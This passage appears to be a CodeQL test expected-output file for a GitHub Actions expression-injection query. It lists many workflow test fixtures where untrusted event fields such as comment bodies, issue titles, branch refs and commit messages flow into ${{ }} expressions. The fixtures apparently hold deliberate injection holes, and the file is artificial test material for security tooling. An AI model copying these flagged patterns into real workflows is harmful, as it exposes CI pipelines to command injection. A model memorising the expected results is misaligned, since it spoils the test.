.github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | semmle.label | github.event.commits[11].author.email | -| .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | 
semmle.label | github.event.commits[11].author.name | -| .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | -| .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | semmle.label | github.event.head_commit.author.email | -| .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | semmle.label | github.event.head_commit.author.name | -| .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | semmle.label | github.event.head_commit.committer.email | -| .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | semmle.label | github.event.head_commit.committer.name | -| .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | semmle.label | github.event.commits[11].committer.email | -| .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | semmle.label | github.event.commits[11].committer.name | -| .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | -| .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | -| .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | semmle.label | Uses Step: source [value] | -| .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | semmle.label | github.event['head_commit']['message'] | -| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | -| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | semmle.label | needs.test1.outputs.job_output | -| .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | semmle.label | Uses Step: summary [value] | -| .github/workflows/simple1.yml:11:20:11:58 | 
github.event.head_commit.message | semmle.label | github.event.head_commit.message | -| .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | semmle.label | steps.summary.outputs.value | -| .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | semmle.label | Uses Step: source | -| .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | -| .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | -| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | -| .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | semmle.label | steps.step2.outputs.test | -| .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | -| .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | semmle.label | github.event['head_commit']['message'] | -| .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | semmle.label | Run Step: step1 [MSG] | -| .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | semmle.label | steps.step0.outputs.value | -| .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | semmle.label | Run Step: step2 [test] | -| .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | semmle.label | steps.step1.outputs.MSG | -| .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | semmle.label | needs.job1.outputs['job_output'] | -| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | semmle.label | github.event.workflow_run.display_title | -| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | semmle.label | 
github.event.workflow_run.head_commit.message | -| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | semmle.label | github.event.workflow_run.head_commit.author.email | -| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | semmle.label | github.event.workflow_run.head_commit.author.name | -| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | semmle.label | github.event.workflow_run.head_commit.committer.email | -| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | semmle.label | github.event.workflow_run.head_commit.committer.name | -| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | -| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | semmle.label | github.event.workflow_run.head_repository.description | -| action1/action.yml:14:19:14:50 | github.event.comment.body | semmle.label | github.event.comment.body | -subpaths -#select -| .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | -| .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | ${{ steps.changed-files.outputs.all_changed_files }} | -| .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | ${{ github.event.issue.body }} | -| .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | ${{ github.event.issue.title }} | -| .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | ${{github.event.issue.body}} | -| .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | ${{ env.ISSUE_BODY_PARSED }} | -| .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | ${{env.pr_message}} | -| .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | -| .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | -| .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | -| .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | -| .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | ${{ github.event.pages[1].title }} | -| .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | ${{ github.event.pages[11].title }} | -| .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | ${{ github.event.pages[0].page_name }} | -| .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | ${{ github.event.pages[2222].page_name }} | -| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | ${{ steps.trim-url.outputs.trimmed_url }} | -| .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | -| .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | -| .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | -| .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | -| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | ${{ github.event.issue.title }} | -| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | ${{ github.event.issue.body }} | -| .github/workflows/issues.yaml:15:19:15:39 | env.global_env | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | ${{ env.global_env }} | -| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | ${{ env.job_env }} | -| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | ${{ env.step_env }} | -| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | -| .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | -| .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | -| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | -| .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | -| .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | -| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | ${{ github.event.review.body }} | -| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | -| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | -| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | -| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | -| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | -| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | -| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | ${{ github.event.issue.title }} | -| .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | ${{ github.event.issue.body }} | -| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | -| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | -| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | -| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | -| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | -| .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | -| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | ${{ github.head_ref }} | -| .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | ${{ github.event.commits[11].message }} | -| .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | ${{ github.event.commits[11].author.email }} | -| .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | ${{ github.event.commits[11].author.name }} | -| .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | -| .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | ${{ github.event.head_commit.author.email }} | -| .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | ${{ github.event.head_commit.author.name }} | -| .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | ${{ github.event.head_commit.committer.email }} | -| .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | ${{ github.event.head_commit.committer.name }} | -| .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | Potential expression injection in $@, which may be controlled by an external user. 
